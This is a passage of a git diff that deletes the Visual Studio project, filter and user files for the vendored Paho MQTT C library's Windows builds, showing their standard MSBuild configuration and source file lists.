-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3a/paho-mqtt3a.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj
deleted file mode 100644
index cfa98a1..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj
+++ /dev/null
@@ -1,204 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{DEF21D1B-CB65-4A78-805F-CF421249EB83}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>pahomqtt3as</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;OPENSSL;WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3AS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-      <AdditionalIncludeDirectories>$(OpenSSLDir)\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;libeay32.lib;ssleay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(OpenSSLDir)\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h" />
-    <ClInclude Include="..\..\src\Heap.h" />
-    <ClInclude Include="..\..\src\LinkedList.h" />
-    <ClInclude Include="..\..\src\Log.h" />
-    <ClInclude Include="..\..\src\Messages.h" />
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPacket.h" />
-    <ClInclude Include="..\..\src\MQTTPacketOut.h" />
-    <ClInclude Include="..\..\src\MQTTPersistence.h" />
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h" />
-    <ClInclude Include="..\..\src\MQTTProtocol.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h" />
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h" />
-    <ClInclude Include="..\..\src\Socket.h" />
-    <ClInclude Include="..\..\src\SocketBuffer.h" />
-    <ClInclude Include="..\..\src\SSLSocket.h" />
-    <ClInclude Include="..\..\src\StackTrace.h" />
-    <ClInclude Include="..\..\src\Thread.h" />
-    <ClInclude Include="..\..\src\Tree.h" />
-    <ClInclude Include="..\..\src\utf-8.h" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c" />
-    <ClCompile Include="..\..\src\Heap.c" />
-    <ClCompile Include="..\..\src\LinkedList.c" />
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\MQTTAsync.c" />
-    <ClCompile Include="..\..\src\MQTTPacket.c" />
-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />
-    <ClCompile Include="..\..\src\MQTTPersistence.c" />
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-    <ClCompile Include="..\..\src\Socket.c" />
-    <ClCompile Include="..\..\src\SocketBuffer.c" />
-    <ClCompile Include="..\..\src\SSLSocket.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\src\Tree.c" />
-    <ClCompile Include="..\..\src\utf-8.c" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.filters
deleted file mode 100644
index 87d749a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.filters
+++ /dev/null
@@ -1,147 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\Clients.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Heap.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\LinkedList.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Log.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Messages.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPacketOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTPersistenceDefault.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocol.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTProtocolOut.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Socket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SocketBuffer.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\SSLSocket.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\StackTrace.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Thread.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\Tree.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\utf-8.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Heap.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\LinkedList.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTAsync.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPacketOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistence.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\MQTTVersion.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Socket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SocketBuffer.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\SSLSocket.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Tree.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\utf-8.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.user
deleted file mode 100644
index ef5ff2a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3as/paho-mqtt3as.vcxproj.user
+++ /dev/null
@@ -1,4 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup />
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj
deleted file mode 100644
index 9461788..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/paho-mqtt3c/paho-mqtt3c.vcxproj
+++ /dev/null
@@ -1,172 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{172F8995-C780-44A1-996C-C7949B4DB35A}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>pahomqtt3c</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>ws2_32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PAHOMQTT3C_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Windows</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Clients.c" />
-    <ClCompile Include="..\..\src\Heap.c" />
-    <ClCompile Include="..\..\src\LinkedList.c" />
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\MQTTClient.c" />
-    <ClCompile Include="..\..\src\MQTTPacket.c" />
-    <ClCompile Include="..\..\src\MQTTPacketOut.c" />
-    <ClCompile Include="..\..\src\MQTTPersistence.c" />
-    <ClCompile Include="..\..\src\MQTTPersistenceDefault.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolClient.c" />
-    <ClCompile Include="..\..\src\MQTTProtocolOut.c" />
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-    <ClCompile Include="..\..\src\Socket.c" />
-    <ClCompile Include="..\..\src\SocketBuffer.c" />
-    <ClCompile Include="..\..\src\SSLSocket.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\src\Tree.c" />
